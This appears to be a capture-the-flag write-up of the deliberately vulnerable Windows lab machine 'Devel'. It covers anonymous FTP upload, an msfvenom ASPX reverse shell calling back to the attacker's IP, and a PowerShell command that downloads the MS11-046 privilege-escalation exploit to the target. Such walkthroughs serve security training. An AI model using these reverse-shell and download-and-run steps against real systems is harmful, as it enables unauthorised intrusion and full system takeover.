The Devel machine is a deliberately vulnerable machine with a Windows operating system found among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of the port scan, it was found that ports 21/tcp ftp Microsoft ftpd and 80/tcp http Microsoft IIS httpd 7.5 were open.
As a result of the nmap scan, we saw that we can log in with anonymous on the ftp port.
We logged in with anonymous:anonymous credential information.
(here different users have added their own shel as they have solved the machine)
Here we see welcome.png and aspnet_client directories in the ftp file.
Let’s go to welcome.png and take a look.
While scanning in Gobuster, we detected the /aspnet_client directory.
We’ve definitely figured out that he’s getting it from ftp. Let’s try to put the file in ftp with put and go.
Let’s go to this directory.
When we go to the directory, we see the note we wrote in it, let’s try to load and run our shell here.
We create the payload using msfvenom
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.19 LPORT=4747 -o maygun.aspx
We uploaded our aspx file to ftp server
We are running our payload, let’s trigger it via broser
That’s how we got our shell
We have limited authorization on this shell
We use the systeminfo command to get information about the system.
Windows 7 Enterprise Build 7600 os system is used, let’s see if there is a vulnerability related to this.
We found local privilege escalation vulnerabilities
Let’s download it from searchsploit here
Here we can see the compilation from the descriptions in the exploit.
Here we have set up a web server with python and then from a Windows machine
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.19:8000/MS11-046.exe’, ‘c:\Users\Public\Downloads\MS11-046.exe’)”
We have executed the command
We ran MS11-046.exe where we obtained the nt authority\system user.
This way we got our user and root flags.